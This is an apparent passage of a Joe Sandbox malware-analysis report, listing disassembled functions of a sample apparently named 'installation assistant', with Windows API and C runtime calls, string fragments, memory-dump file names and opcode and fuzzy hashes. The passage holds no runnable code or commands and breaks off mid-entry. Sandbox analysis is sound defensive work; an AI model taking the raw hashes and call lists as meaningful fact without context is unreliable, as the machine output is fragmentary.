                                          • FreeLibrary.KERNEL32(00000000,?,?,6C7BF1B4,?,?,6C7BF235,?,?,?), ref: 6C7BF175
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1869177051.000000006C631000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C630000, based on PE: true
                                          • Associated: 00000005.00000002.1869151860.000000006C630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1870349068.000000006C7D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871780908.000000006C9A2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID: AddressFreeHandleLibraryModuleProc
                                          • String ID: CorExitProcess$mscoree.dll
                                          • API String ID: 4061214504-1276376045
                                          • Opcode ID: 84d9f19adf4458a34c1b37bb30e30c1b90485c7863f36add948868796df3b993
                                          • Instruction ID: 55cdc67f95c1708ddde77258f6f91d0036a1e7106360cbbdc7e87d94230badfe
                                          • Opcode Fuzzy Hash: 84d9f19adf4458a34c1b37bb30e30c1b90485c7863f36add948868796df3b993
                                          • Instruction Fuzzy Hash: 54F08C37A01519FBDF02AF91CA09B9E7A78EB0979AF204470F805F2060CB308E00EB90
                                          APIs
                                          • __EH_prolog3.LIBCMT ref: 6C7B732E
                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6C7B7339
                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6C7B73A7
                                            • Part of subcall function 6C7B7230: std::locale::_Locimp::_Locimp.LIBCPMT ref: 6C7B7248
                                          • std::locale::_Setgloballocale.LIBCPMT ref: 6C7B7354
                                          • _Yarn.LIBCPMT ref: 6C7B736A
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1869177051.000000006C631000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C630000, based on PE: true
                                          • Associated: 00000005.00000002.1869151860.000000006C630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1870349068.000000006C7D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871780908.000000006C9A2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                          • String ID:
                                          • API String ID: 1088826258-0
                                          • Opcode ID: e5ec5361924648be4c2a5c4d5ad5c1e6d3f177d0933585d061aef3fc32dbae6c
                                          • Instruction ID: 0fc2d46c6e9a7cb90b2093c94add9805acb9ecc46ff804f77f8ae74fd33aa9ff
                                          • Opcode Fuzzy Hash: e5ec5361924648be4c2a5c4d5ad5c1e6d3f177d0933585d061aef3fc32dbae6c
                                          • Instruction Fuzzy Hash: 38018F756005159BCB09DF20CA5DABD77B1FFC6258B190059E801B7780DF34AA4ACBE9
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7E8000, based on PE: true
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID: H_prolog
                                          • String ID: $!$@
                                          • API String ID: 3519838083-2517134481
                                          • Opcode ID: de11a10d9dafd4c65deb6d7f74020d514e490535ea8bbecf2d37e3263791df61
                                          • Instruction ID: 5494339b42b0a1a158d14ad55a483cd26ebe9341bda88990e360b10e0fa2a366
                                          • Opcode Fuzzy Hash: de11a10d9dafd4c65deb6d7f74020d514e490535ea8bbecf2d37e3263791df61
                                          • Instruction Fuzzy Hash: 29126F7091125ADFCB24CFE8C6D0ADDBBB1BF05308F14A869E449ABB51D734E945CBA0
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7E8000, based on PE: true
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID: H_prolog__aulldiv
                                          • String ID: $SJ
                                          • API String ID: 4125985754-3948962906
                                          • Opcode ID: 589161b9174e713d87cd7ea6b7fb48598b4f41844aead815dae59d281551bb28
                                          • Instruction ID: 859f946aaa2ee3113ccb30e9f8792244dce5b196dfe6c6c4898ca3e57f44acff
                                          • Opcode Fuzzy Hash: 589161b9174e713d87cd7ea6b7fb48598b4f41844aead815dae59d281551bb28
                                          • Instruction Fuzzy Hash: 03B16D71E01209DFCB24CF99CA949AEBBB5FF48314F20892EE415A7B51C774AE45CB50
                                          APIs
                                            • Part of subcall function 6C7B7327: __EH_prolog3.LIBCMT ref: 6C7B732E
                                            • Part of subcall function 6C7B7327: std::_Lockit::_Lockit.LIBCPMT ref: 6C7B7339
                                            • Part of subcall function 6C7B7327: std::locale::_Setgloballocale.LIBCPMT ref: 6C7B7354
                                            • Part of subcall function 6C7B7327: _Yarn.LIBCPMT ref: 6C7B736A
                                            • Part of subcall function 6C7B7327: std::_Lockit::~_Lockit.LIBCPMT ref: 6C7B73A7
                                            • Part of subcall function 6C682F60: std::_Lockit::_Lockit.LIBCPMT ref: 6C682F95
                                            • Part of subcall function 6C682F60: std::_Lockit::_Lockit.LIBCPMT ref: 6C682FAF
                                            • Part of subcall function 6C682F60: std::_Lockit::~_Lockit.LIBCPMT ref: 6C682FD0
                                            • Part of subcall function 6C682F60: __Getctype.LIBCPMT ref: 6C683084
                                            • Part of subcall function 6C682F60: std::_Facet_Register.LIBCPMT ref: 6C68309C
                                            • Part of subcall function 6C682F60: std::_Lockit::~_Lockit.LIBCPMT ref: 6C6830B7
                                          • std::ios_base::_Addstd.LIBCPMT ref: 6C68211B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1869177051.000000006C631000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C630000, based on PE: true
                                          • Associated: 00000005.00000002.1869151860.000000006C630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1870349068.000000006C7D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871780908.000000006C9A2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$AddstdFacet_GetctypeH_prolog3RegisterSetgloballocaleYarnstd::ios_base::_std::locale::_
                                          • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                          • API String ID: 3332196525-1866435925
                                          • Opcode ID: 576e690ea831dd7a66c2df2049fa94ba11b343399d0cc65ab563057fa88d7476
                                          • Instruction ID: a3dde39c0f0a23fb650a4201154ff965dc547cf522d5adede2fd583ae0e80af4
                                          • Opcode Fuzzy Hash: 576e690ea831dd7a66c2df2049fa94ba11b343399d0cc65ab563057fa88d7476
                                          • Instruction Fuzzy Hash: DA41C3B1A013098FDB00CF64D8497AEBBB1FF48318F148268E915AB791E7759985CFA4
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7E8000, based on PE: true
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID: H_prolog
                                          • String ID: $CK$CK
                                          • API String ID: 3519838083-2957773085
                                          • Opcode ID: 2704db3354b84918023bfe159d178872147a663a780c49e5ab543107787eea7d
                                          • Instruction ID: 2f2e0067841ce1477ebb3c902a96f7e1d5ccb435d287521b4b993fd216e9ae82
                                          • Opcode Fuzzy Hash: 2704db3354b84918023bfe159d178872147a663a780c49e5ab543107787eea7d
                                          • Instruction Fuzzy Hash: 82219570F012058BDB24DFE8CA901EEB7B2FF94304F544A2EC812E7B91C7745A458A90
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7E8000, based on PE: true
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID: H_prolog
                                          • String ID: 0$LrJ$x
                                          • API String ID: 3519838083-658305261
                                          • Opcode ID: 4d1a12b996d8cdd79ba2c3eb3f59f6bf691634cc710ec0f5f651f2212a36eb1c
                                          • Instruction ID: 3d4d7e09255fa64514c7a4f24da436c2b032d80f4845ebf0476737f5fd5b0298
                                          • Opcode Fuzzy Hash: 4d1a12b996d8cdd79ba2c3eb3f59f6bf691634cc710ec0f5f651f2212a36eb1c
                                          • Instruction Fuzzy Hash: A5216F33D011199ACF15DBE8CA98BEDB7F5EFA8308F20055AD40177A40DB755E08CBA1
                                          APIs
                                          • __EH_prolog.LIBCMT ref: 6C814ECC
                                            • Part of subcall function 6C7FF58A: __EH_prolog.LIBCMT ref: 6C7FF58F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7E8000, based on PE: true
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID: H_prolog
                                          • String ID: :hJ$dJ$xJ
                                          • API String ID: 3519838083-2437443688
                                          • Opcode ID: e3ee415979c90d2d15618e5f431c2d86ccd996bf58f825059be4d34af7dc85d3
                                          • Instruction ID: 5ad7aa053dfcf8594140764994f56dc9ff87486ad205860e3f93b94a5a73e80f
                                          • Opcode Fuzzy Hash: e3ee415979c90d2d15618e5f431c2d86ccd996bf58f825059be4d34af7dc85d3
                                          • Instruction Fuzzy Hash: 6C21DAB1801B40CFC760CF6AC14828ABBF4BF69718B00C96EC0AA97B11D7B8A508CF55
                                          APIs
                                          • SetFilePointerEx.KERNEL32(00000000,?,00000000,6C7CB0D0,6C681DEA,00008000,6C7CB0D0,?,?,?,6C7CAC7F,6C7CB0D0,?,00000000,6C681DEA), ref: 6C7CADC9
                                          • GetLastError.KERNEL32(?,?,?,6C7CAC7F,6C7CB0D0,?,00000000,6C681DEA,?,6C7D469E,6C7CB0D0,000000FF,000000FF,00000002,00008000,6C7CB0D0), ref: 6C7CADD3
                                          • __dosmaperr.LIBCMT ref: 6C7CADDA
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1869177051.000000006C631000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C630000, based on PE: true
                                          • Associated: 00000005.00000002.1869151860.000000006C630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1870349068.000000006C7D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871780908.000000006C9A2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID: ErrorFileLastPointer__dosmaperr
                                          • String ID: 8Q
                                          • API String ID: 2336955059-4022487301
                                          • Opcode ID: 0e34f47fa6ff6d7c1e6433fff1a55de3fe07040ecd7a94e1e53bd94a9cac9e0f
                                          • Instruction ID: f4262eeea44c05fd544ffd1b5ee6fb8bdd2f6cc2d4511f28c939464792419abb
                                          • Opcode Fuzzy Hash: 0e34f47fa6ff6d7c1e6433fff1a55de3fe07040ecd7a94e1e53bd94a9cac9e0f
                                          • Instruction Fuzzy Hash: 6701FC377106157FCF058FAADD0A8DE3B39EF86336B240218E812D7684EB71E9018B91
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7E8000, based on PE: true
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: <J$DJ$HJ$TJ$]
                                          • API String ID: 0-686860805
                                          • Opcode ID: b82db92acc6f2fd2fd2fd5332bfa7d1e38ecda44958a76cbd211a3f1299ff4ed
                                          • Instruction ID: 943c90495925dd94227a767789b5cfe921ff5414c3dbb89095e95f51bb19d12b
                                          • Opcode Fuzzy Hash: b82db92acc6f2fd2fd2fd5332bfa7d1e38ecda44958a76cbd211a3f1299ff4ed
                                          • Instruction Fuzzy Hash: F941D671D01289AFCF24DBA0DA948FEB774AF15318F20C869D13127E61EB31A64DCB11
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7E8000, based on PE: true
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID: __aulldiv
                                          • String ID:
                                          • API String ID: 3732870572-0
                                          • Opcode ID: 2bdaa92217569021002d8658a142890db49ae38c047720c0e1f220da2750cc6e
                                          • Instruction ID: e400082873d6ffeb42f66afba46ae9f60eefd640cf65dce3902cd4a3fbb46561
                                          • Opcode Fuzzy Hash: 2bdaa92217569021002d8658a142890db49ae38c047720c0e1f220da2750cc6e
                                          • Instruction Fuzzy Hash: 80119076301304BFEB354AA8CD44EAF7BBDEF85744F10882DF55156A50C6B1AC449760
                                          APIs
                                          • GetLastError.KERNEL32(?,?,?,6C7BEF64,6C7E6DD8,0000000C), ref: 6C7C49B7
                                          • _free.LIBCMT ref: 6C7C4A14
                                          • _free.LIBCMT ref: 6C7C4A4A
                                          • SetLastError.KERNEL32(00000000,00000008,000000FF,?,?,6C7BEF64,6C7E6DD8,0000000C), ref: 6C7C4A55
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1869177051.000000006C631000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C630000, based on PE: true
                                          • Associated: 00000005.00000002.1869151860.000000006C630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1870349068.000000006C7D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871780908.000000006C9A2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID: ErrorLast_free
                                          • String ID:
                                          • API String ID: 2283115069-0
                                          • Opcode ID: e96b112dfbd3657d8097d13a3fc3b3407ba20a5e675d62dd7d78dafce1c4e34f
                                          • Instruction ID: 6bda217d83607ce74f33754de8855fd5379c046e6b08148630394de7d7810dbf
                                          • Opcode Fuzzy Hash: e96b112dfbd3657d8097d13a3fc3b3407ba20a5e675d62dd7d78dafce1c4e34f
                                          • Instruction Fuzzy Hash: 5A11C4327046036FDA105DB54E8CDBE2679ABC277CB350635F524A2B80EF318C04B15A
                                          APIs
                                          • WriteConsoleW.KERNEL32(00000000,?,6C7D46EC,00000000,00000000,?,6C7D4B51,00000000,00000001,00000000,6C7CB0D0,?,6C7CC286,?,?,6C7CB0D0), ref: 6C7D5ED1
                                          • GetLastError.KERNEL32(?,6C7D4B51,00000000,00000001,00000000,6C7CB0D0,?,6C7CC286,?,?,6C7CB0D0,?,6C7CB0D0,?,6C7CBD1C,6C7D5AB6), ref: 6C7D5EDD
                                            • Part of subcall function 6C7D5F2E: CloseHandle.KERNEL32(FFFFFFFE,6C7D5EED,?,6C7D4B51,00000000,00000001,00000000,6C7CB0D0,?,6C7CC286,?,?,6C7CB0D0,?,6C7CB0D0), ref: 6C7D5F3E
                                          • ___initconout.LIBCMT ref: 6C7D5EED
                                            • Part of subcall function 6C7D5F0F: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6C7D5EAB,6C7D4B3E,6C7CB0D0,?,6C7CC286,?,?,6C7CB0D0,?), ref: 6C7D5F22
                                          • WriteConsoleW.KERNEL32(00000000,?,6C7D46EC,00000000,?,6C7D4B51,00000000,00000001,00000000,6C7CB0D0,?,6C7CC286,?,?,6C7CB0D0,?), ref: 6C7D5F02
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1869177051.000000006C631000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C630000, based on PE: true
                                          • Associated: 00000005.00000002.1869151860.000000006C630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1870349068.000000006C7D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871780908.000000006C9A2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                          • String ID:
                                          • API String ID: 2744216297-0
                                          • Opcode ID: 6e0e3231ffffa5a863fc641d67d745f76a0ecaccfec08924285632f1544cb67f
                                          • Instruction ID: cc491b5222fde89fa545e0dba36e1390432689c9c6ef69d77d9adc1dd3c8291d
                                          • Opcode Fuzzy Hash: 6e0e3231ffffa5a863fc641d67d745f76a0ecaccfec08924285632f1544cb67f
                                          • Instruction Fuzzy Hash: B5F0C777500119BBCF525FE5DC08A893F36FB09765F054521FB1996520CB32AC20EB95
                                          APIs
                                          • __EH_prolog.LIBCMT ref: 6C7EE077
                                            • Part of subcall function 6C7EDFF5: __EH_prolog.LIBCMT ref: 6C7EDFFA
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7E8000, based on PE: true
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID: H_prolog
                                          • String ID: :$\
                                          • API String ID: 3519838083-1166558509
                                          • Opcode ID: 48f4411e2405fcdde49591215dd3ffd545f97566ccde13c94e17e7da02f2e48f
                                          • Instruction ID: 485931f5b1cfe4cbbca6a75cc827d4ed57b16624c8c6c40342dc1442832d79d8
                                          • Opcode Fuzzy Hash: 48f4411e2405fcdde49591215dd3ffd545f97566ccde13c94e17e7da02f2e48f
                                          • Instruction Fuzzy Hash: B2E1153390060C9ACF10DFA4CA987DDB7B5BF5D31CF108929D4516BBA0EB74A949CB91
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7E8000, based on PE: true
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID: H_prolog__aullrem
                                          • String ID: d%K
                                          • API String ID: 3415659256-3110269457
                                          • Opcode ID: edd8db3a4067630c511c1f9d0118cc4b792e07b2613ebc31a4b030f5161dda76
                                          • Instruction ID: 1d55999df53ff56ced03d751297da2518f90be03a1ebd05f28249782cc9c4cd9
                                          • Opcode Fuzzy Hash: edd8db3a4067630c511c1f9d0118cc4b792e07b2613ebc31a4b030f5161dda76
                                          • Instruction Fuzzy Hash: F481F532A012299FCF20CFD8C644BDE77F5AF45308F24A869D818AB641D771D905CBE0
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1869177051.000000006C631000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C630000, based on PE: true
                                          • Associated: 00000005.00000002.1869151860.000000006C630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1870349068.000000006C7D8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871780908.000000006C9A2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID: H_prolog3_
                                          • String ID: 8Q
                                          • API String ID: 2427045233-4022487301
                                          • Opcode ID: 76fe5231bb3a3eb5a10b1ae84995069db603195ceb83f1eb5680a53c526181ad
                                          • Instruction ID: b6c15d17bf0a1a4b51fb4fc612f0cc55b6ad626325b7e6fb21a3906d40d20ebf
                                          • Opcode Fuzzy Hash: 76fe5231bb3a3eb5a10b1ae84995069db603195ceb83f1eb5680a53c526181ad
                                          • Instruction Fuzzy Hash: 1271C671F012579FEB108F96CA84BEE7BB5AF06358F144235E83067A80DF758845CBA2
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7E8000, based on PE: true
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID: H_prolog
                                          • String ID: @$hfJ
                                          • API String ID: 3519838083-1391159562
                                          • Opcode ID: 82ac28e14911e15d6061b9e8fa7e1011da5464f288955fede779c14a83bf3726
                                          • Instruction ID: 742c0bdf6939ebb5ee1f36b79741102067e7561cf4f0293dc1847380d86cde81
                                          • Opcode Fuzzy Hash: 82ac28e14911e15d6061b9e8fa7e1011da5464f288955fede779c14a83bf3726
                                          • Instruction Fuzzy Hash: C2914B71914349EFCB20DF99CA849DEFBF4BF18308F50492EE555A7A50D770AA48CB10
                                          APIs
                                          • __EH_prolog.LIBCMT ref: 6C808C5D
                                            • Part of subcall function 6C80761A: __EH_prolog.LIBCMT ref: 6C80761F
                                            • Part of subcall function 6C807A2E: __EH_prolog.LIBCMT ref: 6C807A33
                                            • Part of subcall function 6C808EA5: __EH_prolog.LIBCMT ref: 6C808EAA
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7E8000, based on PE: true
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID: H_prolog
                                          • String ID: WZJ
                                          • API String ID: 3519838083-1089469559
                                          • Opcode ID: cff2a95f7f2c9e7e47c21d6c2cae1b51bbda01fa4771d0427a5cf66fef2ba2b2
                                          • Instruction ID: ea7b3b8bd70e6e955360060db612f8dd08c092f9c25c95c5c53bfde870ab7adb
                                          • Opcode Fuzzy Hash: cff2a95f7f2c9e7e47c21d6c2cae1b51bbda01fa4771d0427a5cf66fef2ba2b2
                                          • Instruction Fuzzy Hash: 71819432E00159DFCF25DFA8DA94ADDBBB4AF18318F10456AE412B7B90DB306E49CB51
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7E8000, based on PE: true
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000005.00000002.1871037816.000000006C8B9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_6c630000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                          Similarity
                                          • API ID: H_prolog
                                          • String ID: <dJ$Q
                                          • API String ID: 3519838083-2252229148
                                          • Opcode ID: 8611fd72bf4170e71673488c417c1a53bfaf30d487d7fd955d74d6e9e56554ac
                                          • Instruction ID: 4565cc7083d262e6526d6c26d02a89f10b8a62131787aa71456c8cf690fe853c
                                          • Opcode Fuzzy Hash: 8611fd72bf4170e71673488c417c1a53bfaf30d487d7fd955d74d6e9e56554ac
                                          • Instruction Fuzzy Hash: 0551817190424AEFCF20DF98CD848EDB7B1BF49318F10892EE525ABB50D7359A95CB10
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1870417368.000000006C7E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7E8000, based on PE: true
                                          • Associated: 00000005.00000002.1871010009.000000006C8B3000.00000004.00000001.01000000.00000009.sdmpDownload File
